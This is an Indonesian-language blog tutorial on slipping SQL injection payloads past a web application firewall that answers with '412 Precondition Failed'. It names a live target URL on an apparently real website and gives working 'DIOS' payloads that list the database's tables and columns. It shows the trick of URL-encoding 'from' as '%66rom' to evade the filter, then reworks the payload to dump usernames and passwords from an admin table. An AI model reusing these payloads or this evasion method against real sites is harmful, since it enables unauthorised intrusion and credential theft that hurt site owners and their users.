Bypass 412 Precondition Failed SQL Injections

Sunday, July 8, 2018

Bypass 412 Precondition Failed SQL Injections

    No comments
WAF Bypass
Assalamualaikum Wr Wb

Kali Ini saya akan memberi tutorial bypass WAF 412 saat melakukan DIOS (SQL Injections)
Langsung saja tanpa basa basi

pertama :

Buka target yang mau di bypass 

  • Live Target : http://layangaero.com/?page=news_details&id=25

Order by dulu seperti biasa
lalu union select juga seperti biasa 
Nah pas mau masukin dios nanti ketemu sama Error 412 Precondition Failed


412 Precondition Failed


Mari Kita Bypass Waf Nya

Cara nya gampang ganti huruf F pada kata From di DIOS menjadi %66 (Hasil urlencode dari huruf F)

Contoh :

  • make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) 
Kita Ubah Menjadi

  • make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Lalu Masukan ke Magic Number Nya
Lalu Tekan Enter
Dan Lihat 



WAF nya sudah terbypass
Jika mau dump username dan password Bypass Lagi caranya 

Ubah Nama Tabel Dan Column Nya

Contoh :
  • make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Ubah Jadi
  • make_set(6,@:=0x0a,(select(1)%66rom(admin)where@:=make_set(511,@,0x3c6c693e,username,password)),@)
Maka Akan Keluar data yang ingin di dump

Sekian Dari Saya Kurang Lebih nya mohon maaf
Wassalamualaikum wr wb



No comments :

Post a Comment

Subscribe to: Post Comments ( Atom )